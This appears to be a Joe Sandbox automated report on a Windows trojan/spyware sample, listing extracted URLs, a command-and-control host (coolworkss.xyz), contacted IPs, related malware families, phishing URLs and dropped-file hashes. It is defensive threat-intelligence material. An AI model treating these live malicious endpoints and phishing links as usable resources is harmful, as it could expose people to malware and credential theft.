                                                                                                                                  https://github.com/isaacs/readable-stream/issues/16lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://api.freshaddress.biz/js/lib/freshaddress-client-7.0.min.js?token=6075cbbd36a1f0f92cddb595415lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://foo.comlJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.info-zip.org/lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004F74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdnjs.cloudflare.com/ajax/libs/luminateExtend/1.8.3/luminateExtend.min.jslJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/antirez/linenoiselJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.thawte.com/repository0lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://pod.tst.eu/http://cvs.schmorp.de/libev/ev.pod#Be_smart_about_timeoutslJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://www.worldwildlife.org/pages/our-valueslJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://coolworkss.xyz/c2sockwexplorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://coolworkss.xyz/c2sockyexplorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                unknown
                                                                                                                                                https://i.imgur.com/lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.worldwildlife.org/?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utmlJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://coolworkss.xyz/c2socktexplorer.exe, 00000013.00000003.375236074.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.359062273.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.360661950.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.357518038.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455543101.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.376847383.0000000005A1E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    unknown
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    199.232.32.193
                                                                                                                                                    ipv4.imgur.map.fastly.netUnited States
                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                    104.18.6.142
                                                                                                                                                    wwf.orgUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    104.18.6.94
                                                                                                                                                    www.worldwildlife.orgUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    104.21.60.111
                                                                                                                                                    unknownUnited States
                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                    172.67.195.229
                                                                                                                                                    coolworkss.xyzUnited States
                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                    Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                    Analysis ID:1303447
                                                                                                                                                    Start date and time:2023-09-05 13:00:23 +02:00
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 9m 55s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Run with higher sleep bypass
                                                                                                                                                    Number of analysed new started processes analysed:26
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample file name:lJ2eYRm0Bd.exe
                                                                                                                                                    Original Sample Name:37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/3@40/5
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 100% (good quality ratio 0%)
                                                                                                                                                    • Quality average: 7%
                                                                                                                                                    • Quality standard deviation: 7%
                                                                                                                                                    HCA Information:Failed
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, kv501.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, arc.msn.com
                                                                                                                                                    • Execution Graph export aborted for target lJ2eYRm0Bd.exe, PID 6968 because there are no executed function
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • VT rate limit hit for: lJ2eYRm0Bd.exe
                                                                                                                                                    No simulations
                                                                                                                                                    No context
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    ipv4.imgur.map.fastly.nethttps://calendar.event-invites.com/XYW1wSVFWVmtiSGh0YzNSdmF6WlRUM0JqTVM5dFVpdFFhekZ3YmxSdU1ub3dVVzlJVFdWSFpuSjBkM05aT0VweFFrNTZNM1J6TlZCVldGcENRMUEwTWpBemVIcExhMjlqVkVaUmIzVlZUVkkxUWtGcGJYcEdUVWRTWmpWa1JrSjViR0Y2WlhOd2NDczRkRGhYVGxKVFREQXlWekpNVVVzeFFXMUlZVkpOTVdaT1RDdGthRkpoYm1ob1pUZGhhamhITkVKRGJtVnNhM0pYYUcxclV6RkNiekZpY1daeU9GZGxTaTlpYTFsc2R6VTRXRWRsWlRKTE5YSkpPR3BYVGpORkxTMTBTbXRGZVU5MFZGZHdWSEoyZEdKb2NYVlVWVWxSUFQwPS0tMmZmNDdiNjRhMjkwYzUwNmU3NjAyY2E1ZTk5N2MzM2Y5NTFjZWEzOA==?cid=18149234Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 146.75.116.193
                                                                                                                                                    https://2fa.com-token-auth.com/XTXpCU1VFeElWRzVGZEhnMkwwZHVRVFIxWmxwMldXVklOSGt5TjNJclMzWTBka3BFUVVwT1psZEtkVGxIWVVwV0x6aDNSVFZTTlhSeFlrTTJlVUpHTTNWVU1pdE9aR05aUWxFMlFqUm9hVU4yYkRRNVpVd3hlazFOVDJKbGFVNU5aSEYzYlZKak5VSlVRbEZXVWpkcmJIbGtMMkZrTlhjdlR6aHVjelZYWjFOd1YxVklPSEIyZFZoMmMyaHlMekp2WTFGR2ExRTVaVzUxYmxnNFdHWm1aemMzU2s5S2NIYzRWa0UwUFMwdFJqZ3lOM1ZsVlZGaGIxcEhWeTk0WVVkVGIwOXlVVDA5LS05NzIxMDAyNDRlYWQ1MTkyYTM3ZDEyYjhlNDA4ZGU4NWQwM2YxNjk5?cid=1695050992Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 146.75.116.193
                                                                                                                                                    https://2fa.com-token-auth.com/XTXpCU1VFeElWRzVGZEhnMkwwZHVRVFIxWmxwMldXVklOSGt5TjNJclMzWTBka3BFUVVwT1psZEtkVGxIWVVwV0x6aDNSVFZTTlhSeFlrTTJlVUpHTTNWVU1pdE9aR05aUWxFMlFqUm9hVU4yYkRRNVpVd3hlazFOVDJKbGFVNU5aSEYzYlZKak5VSlVRbEZXVWpkcmJIbGtMMkZrTlhjdlR6aHVjelZYWjFOd1YxVklPSEIyZFZoMmMyaHlMekp2WTFGR2ExRTVaVzUxYmxnNFdHWm1aemMzU2s5S2NIYzRWa0UwUFMwdFJqZ3lOM1ZsVlZGaGIxcEhWeTk0WVVkVGIwOXlVVDA5LS05NzIxMDAyNDRlYWQ1MTkyYTM3ZDEyYjhlNDA4ZGU4NWQwM2YxNjk5?cid=1695050992Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 146.75.120.193
                                                                                                                                                    Purchase Order - Akerbla.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    MSC_SHIPPING_DOCUMENTS_Schulergroup_9721.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    https://bonus-fortune@wa0.ru/tigers/?ParticipeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 146.75.52.193
                                                                                                                                                    https://robust-backend.ancillarycheese.com/XTUhSREt6ZFdTM1p5Y0haeUwwSlFTVWRwVGpKeFFuYzVUVk5yWkROTmQyMU5hMGxxVVRWMFltbHpSM2RNVDJ0UmNFMW9VbnBETVRVMmRqWllSVWhNSzJSWFRIaDFWbWtyVjNoYWNrRmhabXAzVERWSGEzaGtTSHBNTm5CMlNYbFdlVGh3YVVWTFQzRm9XbmxGWm14V1FuaHRiRGQ2UWpKdk9ERkxUVFpYYnpReVZWSm9VWE5aSzJaeFRYTkhNSFJyUlV0MGVuZFNjbGRsUW5oVFZUSnNNRU56V1N0a04yZEVaSGxyUFMwdE9GSnpZa0VyV0VWak1uZE5URnBUV2tOYWN6QmpaejA5LS03Njc0OGM2OGZhZWJkNzU3OWZkMjlkYjNjMTIyNjYyNjA0ZmZmZjc5?cid=1690512398Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    https://mail.kb4.io/XYTIwMlNrTjNNVzF1Ykd0a1YzaENjV2RoTmxVMFNFa3pLM2hVYkhkVlpsUTRUWGh1Wm1SQ2RtWk9VREY2TVU5VVNtSXZkVmhZT0RGRVRVNUVjMjlzTjBkQ01VZGhaVTlCYkRoSWMxSldhMkZCVFdwYWVuRnNTalpMZW5GMFUybG9hRE5UTkhsalQyeEpSWGxKTkhaTWVEWk1iMWRSVURKU2EwWXZRVUppTHpoYWFrUjFUMmRHV1ZWeFZUUkdZVFo1ZURGeVMwNWxlWE5QVmtSRk1VczRhRTlFTUdjNU5UaDRPRFZSUFMwdFpEaFJTVVpIVVcxS1EzaFhVbmhtSzJzd1NDOW9VVDA5LS1mNTdhZTE2YTQ5OTVkZDMxMWFiZTA4MmRkZTc2YjgzNjUwOWNiZDU5?cid=1659664590Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    Setup.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                    • 146.75.52.193
                                                                                                                                                    Setup.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    4Fau7Mt9J9.exeGet hashmaliciousSystemBCBrowse
                                                                                                                                                    • 146.75.52.193
                                                                                                                                                    document2.docGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 146.75.116.193
                                                                                                                                                    https://onedrive.live.com/redir?resid=DCEE9ABA390AE9B0%2112434&authkey=%21ACk1_FrhDN3hk3c&page=View&wd=target%28Quick%20Notes.one%7Cbbfca687-9e6d-45a7-97ac-fbc8dbf907ed%2Fdenkstatt%20GmbH%7Cd89e380a-9e85-474b-af9c-56f14c5d911c%2F%29&wdorigin=NavigationUrlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    https://pimms.lt.emlnk.com/Prod/link-tracker?notrack=1&redirectUrl=aHR0cHMlM0ElMkYlMkZwdWItZTUxODI0OWVmNDQ3NDI1NzlmOGYyZjFhYzJlZmUwNmEucjIuZGV2JTJGb2ZmaWNlLmh0bWw=&sig=9bswD4QhsaM1qEEMU8hGwodhoQmPsGw8Ddf6tJ6k6etf&iat=1691035306&a=%7C%7C69055402%7C%7C&account=pimms%2Eactivehosted%2Ecom&email=LBhNDmgfHvaMsl1%2FPsB1yn9%2FYOic7udGXTn4Bt90%3Aa4sZychuJBoNP0oYvPEw%2FpbE8yVHlJQf&s=6ebf5ae87ee526aca993872c2675c4bd&i=1A3A1A8#joonwookim@bloomvista.co.krGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    Quarantined Messages (2).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 146.75.116.193
                                                                                                                                                    message .htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    https://2fa.com-token-auth.com/XYW1JNFVVUjJSV1JQVm5wQ1NtdzFha2xtZWpSd2FrYzJiemhEZFU5cVRVczBRalE1UTB4R1pYbzJWV1J6UmtGU1ZHdFhOSEZNUmxsVU9GSm5hMVpZZDFaelNrZHBRelpGVW1RMFNYbzVjbmwyVVZVMWN6VTFlWFYxU1dveFZrOHpaa0pITjBkTmVqTXZVVFJyY0dNclJpOWtNVGh3WW5FNFptUTRiMU5VVkhsbGFXUlhNVVZwVVhGM1JtbFNlbkJxZWs5V1ZrNDJRbU5FY0M5QlMxTnVTVVo0U2tNeFZEWjZSalJKUFMwdFozVkZVMFpyVlZwTmFtSldNRWRTTVdOdFFUWlFaejA5LS05NzAwODk5NzBlYjRjYjIxMmEyODk3ZDg1NmVhMTBkZjk0ZTEyODU5?cid=1659112930Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    New P0.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    http://vn.happyvalentinesday2020.online/Twin-Cities-Area-Map-Counties-And-4aee.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.240.193
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    FASTLYUShttps://in.xero.com/rcIzVV1Aw3le1rpmJnXmjCQw4eEwppCWv5ARUNBQ?utm_source=invoiceEmailPayNowButton#paynowGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 199.232.32.157
                                                                                                                                                    https://in.xero.com/YpP5d5zURmMawfQ1Dats7DlIMVs8e0vVw1aFKgFA?utm_source=invoiceEmailPayNowButton#paynowGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.108
                                                                                                                                                    https://in.xero.com/YpP5d5zURmMawfQ1Dats7DlIMVs8e0vVw1aFKgFAGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.108
                                                                                                                                                    https://in.xero.com/YpP5d5zURmMawfQ1Dats7DlIMVs8e0vVw1aFKgFAGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    https://irp.cdn-website.com/6e885bb5/files/uploaded/tedidokited.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    https://jimdo-storage.global.ssl.fastly.net/file/df3f41da-2a22-4b20-800c-f7338c634115/10679520094.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.194
                                                                                                                                                    https://bafybeibxyxajksrfoshmkgtyle54lxb3tftoep6c4nu4744yfo6qpzcdzi.ipfs.cf-ipfs.com/?openboxmailer/auto/eMail.web/987FTmail.authenticate/checking_auth0/authenticate-userid/84778949884903948993839/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    https://3xqoezjop5pbyppog7vv.70ecprr.ru/ef56/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    KLKoNDE2QG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 199.233.13.38
                                                                                                                                                    https://www.seekpng.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.194.217
                                                                                                                                                    Install.shGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 185.199.111.133
                                                                                                                                                    file.exeGet hashmaliciousClipboard Hijacker, ToxicEyeBrowse
                                                                                                                                                    • 185.199.110.133
                                                                                                                                                    Yim.Launchpad.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 185.199.108.133
                                                                                                                                                    https://f9e08fa5.813046d4d046dc5fe328d669.workers.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    RGRET06N.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.8.159
                                                                                                                                                    paiement.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.26
                                                                                                                                                    https://t.co/pHYVQrcmOWGet hashmaliciousPhisherBrowse
                                                                                                                                                    • 151.101.65.44
                                                                                                                                                    http://thompson-hill.com/authenticationsupport/?userid=Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    Swift_003001994805009873009940021984003_Bank_of_Baroda_export.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                    • 199.232.192.209
                                                                                                                                                    https://unqknkro61lymq5l0vsr.cvk5omd.ru/789qrst7/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 151.101.1.140
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    5yyhzAj6dY.exeGet hashmaliciousSmokeLoader, Stealc, VidarBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    file.exeGet hashmaliciousSmokeLoader, Stealc, VidarBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    new_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    new_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    cv4TCGxUjvS.exeGet hashmaliciousKnightCryptBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    8_0.exeGet hashmaliciousKnightCryptBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    cv4TCGxUjvS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    8_0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    HhcSy5LcAb.exeGet hashmaliciousVidar, onlyLoggerBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    dbnXGwXFlH.exeGet hashmaliciousVidar, onlyLoggerBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    mh3J5rNiL7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    hXc1HKdJz9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    dhvJVmmIiU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 199.232.32.193
                                                                                                                                                    • 104.18.6.94
                                                                                                                                                    • 104.18.6.142
                                                                                                                                                    No context
                                                                                                                                                    Process:C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):828959
                                                                                                                                                    Entropy (8bit):7.745470009652945
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:bJQqhlAyXeD9VgUnelq9rKK0TII35+x46:bJDhOVgKel1JII3C46
                                                                                                                                                    MD5:CA8A56FF997260608AC69BF808F364D8
                                                                                                                                                    SHA1:A65492F40F2D64D8EFB33BBF0E7AFCF4BF1A4B50
                                                                                                                                                    SHA-256:69EEE39B528D4DE8E9A32A54909BD216AEB2C17C21D4647A2FE1785276878B3C
                                                                                                                                                    SHA-512:C8B449AF0ED228D3138B5B9D012AF6729279250C05EBA7D3D14A457F9794633575BF3B2FFFBBA88766CE28E05E02DD68179C53B26282D0536611BBAADB143E4C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:t..w..w..w..v..3..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..R..3..R........ ......$...............$......w..w..w..w..w..w..w..w..w..w..w..4.........2...w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..4.....>......w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..R..3...+..........2.........w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w.....Y..E..w..w..w..w..w..w..w..w..w..w..
                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):396288
                                                                                                                                                    Entropy (8bit):6.7245770007434
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:IbPLF9Ocyp/5ci5NkcR3KT8MnIpwW1lSbxzlYK+bZxUn6erkA4uWSi711KTlgvVr:IrRUci5NB3EIblSbn6xWrk0WSi71zuDo
                                                                                                                                                    MD5:D0382CD885B4DBAAA91CA457F0916F9D
                                                                                                                                                    SHA1:4A40CAB723987F8B1ED8AC303D8682A377B25D8C
                                                                                                                                                    SHA-256:AFD30E075E2171368E3C1EDA796E74630124CC77716C53B42DD07AEFC4F617B1
                                                                                                                                                    SHA-512:3807612C172C188A91E3DDAB0AB51AC054D3646648A87DC552A163405138AA224899AB6C392A0687901EBCCE9CFDE726D0905319E64404CA4DA6DA778BF24283
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....1ST.................$..........L.............@..........................@............@.................................H........................................................................k...............................................text....#.......$.................. ..`.rdata.......@.......(..............@..@.data...............................@....reloc..............................@..Bklnhh........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):700022
                                                                                                                                                    Entropy (8bit):7.9457902094257244
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:IzKbcdVYuyizLGJUeCH7+q1dGzY4FYvK3Nqya5H35qXLbTtZR6FnlE5:ImbaVxyULYwqY4FYvYKH35cLbhA25
                                                                                                                                                    MD5:E62595773572E53D2CD454ADA5A4CAFF
                                                                                                                                                    SHA1:662A67FF55AB27394980E504D2B6433C76C7D421
                                                                                                                                                    SHA-256:1C5848923B4D59858D6E5EDF9859DFC358456D1A61B475CADEDF4705158F7F5D
